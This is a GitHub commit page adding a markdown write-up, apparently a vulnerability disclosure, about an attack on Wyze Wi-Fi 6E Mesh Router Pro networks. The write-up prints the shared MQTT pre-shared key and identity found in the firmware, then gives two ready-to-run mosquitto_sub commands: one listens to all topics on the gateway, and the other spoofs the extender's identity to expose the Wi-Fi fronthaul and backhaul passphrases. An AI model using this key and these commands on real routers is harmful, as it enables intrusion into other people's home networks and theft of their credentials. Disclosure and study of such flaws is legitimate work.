-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
3 changed files
with
45 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,45 @@ | ||
| # Wyze Mesh Network Attack | ||
| ## Intro | ||
| In this write-up, we use Wyze Wi-Fi 6E Mesh Router Pro, firmware version 1.0.1.109 as an illustration example. | ||
|
|
||
| Wyze uses MQTT with TLS as its NAPS protocol. The gateway node opens TCP port 1883 for this purpose. | ||
|
|
||
| However, all Wyze mesh networks share a common key for these MQTT connections, which is a type of vulnerability called "missing cross-layer trust". | ||
|
|
||
| To perform the Wi-Fi passphrase stealing attack, we first search the Wyze firmware and find the MQTT PSK to be: | ||
| ``` | ||
| 72262d702857592b7a5d2925474c5f4b466d2d7875632e5d2155717a7b784052656d527a284a3e4b71597a645b2b2f533c292921465748213e7754756e71262c | ||
| ``` | ||
|
|
||
| The `psk-identity` of this PSK is `LO_MESH6`. How to find this key within the firmware is left as an exercise. | ||
|
|
||
| Thus, an attacker can directly dial encrypted connections to a gateway's port 1883 to read Wi-Fi fronthaul/backhaul passphrases. | ||
|
|
||
| ## Attack Step 1: Subscribe and listen to all topics of the MQTT channel | ||
|
|
||
| Install `mosquitto_sub` and run the following command: | ||
|
|
||
| ``` | ||
| mosquitto_sub -h 192.168.50.1 -p 1883 --psk-identity LO_MESH6 --psk 72262d702857592b7a5d2925474c5f4b466d2d7875632e5d2155717a7b784052656d527a284a3e4b71597a645b2b2f533c292921465748213e7754756e71262c -t '#' -d | ||
| ``` | ||
|
|
||
| You will start to see some non-critical control data: | ||
|  | ||
|
|
||
| Then, you can see the identity `LO_MESH6E_7C78B2E999C0`. This is the extender's MQTT identity. | ||
|
|
||
| We see only non-critical data here. For example, Wi-Fi fronthaul/backhaul passphrases are not shown. In the next step, we will manually trigger a contention/race condition by spoofing `LO_MESH6E_7C78B2E999C0`. In this way, the extender node will try to reinitiate MQTT connections and pull network access policies from the gateway node. | ||
|
|
||
| ## Attack Step 2: Spoof the extender identity with another MQTT connection, and read Wi-Fi fronthaul/backhaul passphrases. | ||
| Keep the first connection on and use another terminal window to open another MQTT connection and spoof the extender identity: | ||
|
|
||
| ``` | ||
| mosquitto_sub -h 192.168.50.1 -p 1883 --psk-identity LO_MESH6 --psk 72262d702857592b7a5d2925474c5f4b466d2d7875632e5d2155717a7b784052656d527a284a3e4b71597a645b2b2f533c292921465748213e7754756e71262c -i LO_MESH6E_7C78B2E999C0 -t 'liteon/device/LO_MESH6E_7C78B2E999C0/#' -d | ||
| ``` | ||
|
|
||
| You will immediately see critical control data showing up in the first connection: | ||
|
|
||
|  | ||
|
|
||
| You can see Wi-Fi fronthaul/backhaul passphrases there. | ||
|
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.